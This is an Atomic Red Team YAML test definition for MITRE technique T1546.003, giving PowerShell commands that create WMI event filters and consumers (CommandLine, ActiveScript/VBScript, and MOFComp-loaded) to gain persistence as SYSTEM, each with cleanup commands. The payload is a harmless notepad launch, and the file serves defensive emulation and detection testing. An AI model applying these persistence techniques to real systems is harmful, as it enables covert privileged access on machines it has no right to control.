Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
130 lines
7.5 KiB
YAML
130 lines
7.5 KiB
YAML
attack_technique: T1546.003
|
|
display_name: 'Event Triggered Execution: Windows Management Instrumentation Event Subscription'
|
|
atomic_tests:
|
|
- name: Persistence via WMI Event Subscription - CommandLineEventConsumer
|
|
auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0
|
|
description: |
|
|
Run from an administrator powershell window. After running, reboot the victim machine.
|
|
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
|
|
|
|
Code references
|
|
|
|
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
|
|
|
|
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
|
|
EventNameSpace='root\CimV2';
|
|
QueryLanguage="WQL";
|
|
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
|
|
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
|
|
|
|
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
|
|
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
|
|
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
|
|
|
|
$FilterToConsumerArgs = @{
|
|
Filter = [Ref] $Filter;
|
|
Consumer = [Ref] $Consumer;
|
|
}
|
|
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
|
|
cleanup_command: |
|
|
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
|
|
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
|
|
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
|
|
$FilterConsumerBindingToCleanup | Remove-WmiObject
|
|
$EventConsumerToCleanup | Remove-WmiObject
|
|
$EventFilterToCleanup | Remove-WmiObject
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: Persistence via WMI Event Subscription - ActiveScriptEventConsumer
|
|
auto_generated_guid: fecd0dfd-fb55-45fa-a10b-6250272d0832
|
|
description: |
|
|
Run from an administrator powershell window. After running, reboot the victim machine.
|
|
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
|
|
|
|
Code references
|
|
|
|
https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
|
|
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
|
|
EventNameSpace='root\CimV2';
|
|
QueryLanguage="WQL";
|
|
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
|
|
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
|
|
|
|
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
|
|
ScriptingEngine='VBScript';
|
|
ScriptText='
|
|
Set objws = CreateObject("Wscript.Shell")
|
|
objws.Run "notepad.exe", 0, True
|
|
'}
|
|
$Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
|
|
|
|
$FilterToConsumerArgs = @{
|
|
Filter = $Filter;
|
|
Consumer = $Consumer;
|
|
}
|
|
$FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs
|
|
cleanup_command: |
|
|
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
|
|
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
|
|
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
|
|
$FilterConsumerBindingToCleanup | Remove-WmiObject
|
|
$EventConsumerToCleanup | Remove-WmiObject
|
|
$EventFilterToCleanup | Remove-WmiObject
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: Windows MOFComp.exe Load MOF File
|
|
auto_generated_guid: 29786d7e-8916-4de6-9c55-be7b093b2706
|
|
description: |
|
|
The following Atomic will utilize MOFComp.exe to load a local MOF file.
|
|
The Managed Object Format (MOF) compiler parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
|
|
To query for the class: gwmi __eventfilter -namespace root\subscription
|
|
A successful execution will add the class to WMI root namespace.
|
|
Reference: https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
mofcomp_path:
|
|
description: Location of mofcomp.exe
|
|
type: string
|
|
default: c:\windows\system32\wbem\mofcomp.exe
|
|
mof_file:
|
|
description: Local location MOF file
|
|
type: string
|
|
default: PathToAtomicsFolder\T1546.003\src\T1546.003.mof
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
MofComp.exe must exist on disk at specified location (#{mofcomp_path})
|
|
prereq_command: |
|
|
if (Test-Path "#{mofcomp_path}") { exit 0} else { exit 1}
|
|
get_prereq_command: |
|
|
Validate MOFComp.exe is on disk somewhere and update input argument.
|
|
- description: |
|
|
MofComp.exe must exist on disk at specified location (#{mof_file})
|
|
prereq_command: |
|
|
if (Test-Path "#{mof_file}") { exit 0} else { exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{mof_file}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.003/src/T1546.003.mof" -OutFile "#{mof_file}"
|
|
executor:
|
|
command: |
|
|
#{mofcomp_path} "#{mof_file}"
|
|
cleanup_command: |
|
|
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam_consumer'"
|
|
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam_filter'"
|
|
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
|
|
$FilterConsumerBindingToCleanup | Remove-WmiObject
|
|
$EventConsumerToCleanup | Remove-WmiObject
|
|
$EventFilterToCleanup | Remove-WmiObject
|
|
name: powershell
|